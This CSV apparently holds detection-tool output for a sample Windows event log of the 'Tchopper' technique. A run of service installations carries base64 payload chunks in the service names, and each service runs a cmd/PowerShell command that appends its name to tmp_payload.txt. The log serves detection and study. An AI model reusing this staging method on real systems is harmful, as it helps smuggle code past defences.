2021-11-03 17:17:01.428 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: INCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCiMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:01.428 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: INCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCiMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:02.892 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIHRlc3QgY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:02.892 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIHRlc3QgY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:02.892 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIHRlc3QgY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:04.364 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 9ubmVjdGlvbg0KDQojQHBhcmFtICRDcmVkICAgICAtPiAgVGhlIEV2ZW50IExvZw0KI0BwYXJhbSAkQ29tcHV0ZXIgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQgZm9yIHRoZSBnaXZlbiBs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:04.364 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9ubmVjdGlvbg0KDQojQHBhcmFtICRDcmVkICAgICAtPiAgVGhlIEV2ZW50IExvZw0KI0BwYXJhbSAkQ29tcHV0ZXIgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQgZm9yIHRoZSBnaXZlbiBs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:04.364 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9ubmVjdGlvbg0KDQojQHBhcmFtICRDcmVkICAgICAtPiAgVGhlIEV2ZW50IExvZw0KI0BwYXJhbSAkQ29tcHV0ZXIgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQgZm9yIHRoZSBnaXZlbiBs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:05.817 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: b2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:05.817 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:05.817 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:07.256 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: lvbiBUZXN0LUhvc3RDb25uZWN0aW9uIHsgcGFyYW0oJENvbXB1dGVyKSAgICANCg0KICAgIHRyeSB7DQoNCiAgICAgICAgaWYgKChUZXN0LUNvbm5lY3Rpb24gLUNvbXB1dGVyTmFtZSAkQ29tcHV0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:07.256 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: lvbiBUZXN0LUhvc3RDb25uZWN0aW9uIHsgcGFyYW0oJENvbXB1dGVyKSAgICANCg0KICAgIHRyeSB7DQoNCiAgICAgICAgaWYgKChUZXN0LUNvbm5lY3Rpb24gLUNvbXB1dGVyTmFtZSAkQ29tcHV0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:07.256 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lvbiBUZXN0LUhvc3RDb25uZWN0aW9uIHsgcGFyYW0oJENvbXB1dGVyKSAgICANCg0KICAgIHRyeSB7DQoNCiAgICAgICAgaWYgKChUZXN0LUNvbm5lY3Rpb24gLUNvbXB1dGVyTmFtZSAkQ29tcHV0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:08.709 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZXIgLWNvdW50IDEgLXF1aWV0KSkgew0KDQogICAgICAgICAgICByZXR1cm4gJHRydWUNCiAgICAgICAgfQ0KDQogICAgICAgIGVsc2Ugew0KDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:08.709 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZXIgLWNvdW50IDEgLXF1aWV0KSkgew0KDQogICAgICAgICAgICByZXR1cm4gJHRydWUNCiAgICAgICAgfQ0KDQogICAgICAgIGVsc2Ugew0KDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:08.709 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZXIgLWNvdW50IDEgLXF1aWV0KSkgew0KDQogICAgICAgICAgICByZXR1cm4gJHRydWUNCiAgICAgICAgfQ0KDQogICAgICAgIGVsc2Ugew0KDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:10.219 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: JfTE9HICJVbmFibGUgdG8gY29udGFjdCAkQ29tcHV0ZXIuIFBsZWFzZSB2ZXJpZnkgaXRzIG5ldHdvcmsgY29ubmVjdGl2aXR5IGFuZCB0cnkgYWdhaW4iDQoNCiAgICAgICAgICAgICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:10.219 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JfTE9HICJVbmFibGUgdG8gY29udGFjdCAkQ29tcHV0ZXIuIFBsZWFzZSB2ZXJpZnkgaXRzIG5ldHdvcmsgY29ubmVjdGl2aXR5IGFuZCB0cnkgYWdhaW4iDQoNCiAgICAgICAgICAgICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:10.219 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JfTE9HICJVbmFibGUgdG8gY29udGFjdCAkQ29tcHV0ZXIuIFBsZWFzZSB2ZXJpZnkgaXRzIG5ldHdvcmsgY29ubmVjdGl2aXR5IGFuZCB0cnkgYWdhaW4iDQoNCiAgICAgICAgICAgICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:11.712 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Q29ubmVjdGlvbklzc3VlcyA9ICRHbG9iYWw6Q29ubmVjdGlvbklzc3VlcyArIDENCg0KICAgICAgICAgICAgcmV0dXJuICRmYWxzZQ0KICAgICAgICB9ICAgICAgICANCiAgICB9DQoNCiAgICBjYX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:11.712 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Q29ubmVjdGlvbklzc3VlcyA9ICRHbG9iYWw6Q29ubmVjdGlvbklzc3VlcyArIDENCg0KICAgICAgICAgICAgcmV0dXJuICRmYWxzZQ0KICAgICAgICB9ICAgICAgICANCiAgICB9DQoNCiAgICBjYX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:11.712 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Q29ubmVjdGlvbklzc3VlcyA9ICRHbG9iYWw6Q29ubmVjdGlvbklzc3VlcyArIDENCg0KICAgICAgICAgICAgcmV0dXJuICRmYWxzZQ0KICAgICAgICB9ICAgICAgICANCiAgICB9DQoNCiAgICBjYX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:13.157 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: RjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSBjb25lY3QgdG8gSG9zdCINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:13.157 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSBjb25lY3QgdG8gSG9zdCINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:13.157 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSBjb25lY3QgdG8gSG9zdCINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:14.610 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:14.610 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:14.610 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:16.058 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: VtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCg0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:16.058 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCg0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:16.058 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCg0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:17.508 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gQ3JlYXRlIGEgbG9nIHJlcG9ydCBmb3IgdGhlIGVhY2ggY29tcHV0ZXIgaW4gdGhlIGNvbXB1dGVyIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:17.508 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gQ3JlYXRlIGEgbG9nIHJlcG9ydCBmb3IgdGhlIGVhY2ggY29tcHV0ZXIgaW4gdGhlIGNvbXB1dGVyIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:17.508 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gQ3JlYXRlIGEgbG9nIHJlcG9ydCBmb3IgdGhlIGVhY2ggY29tcHV0ZXIgaW4gdGhlIGNvbXB1dGVyIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:18.961 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: xpc3QNCg0KI0BwYXJhbSAkTG9nTmFtZSAgICAgICAgICAgIC0+ICBUaGUgRXZlbnQgTG9nDQojQHBhcmFtICRBdmdFdmVudHNQZXJTZWNvbmQgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
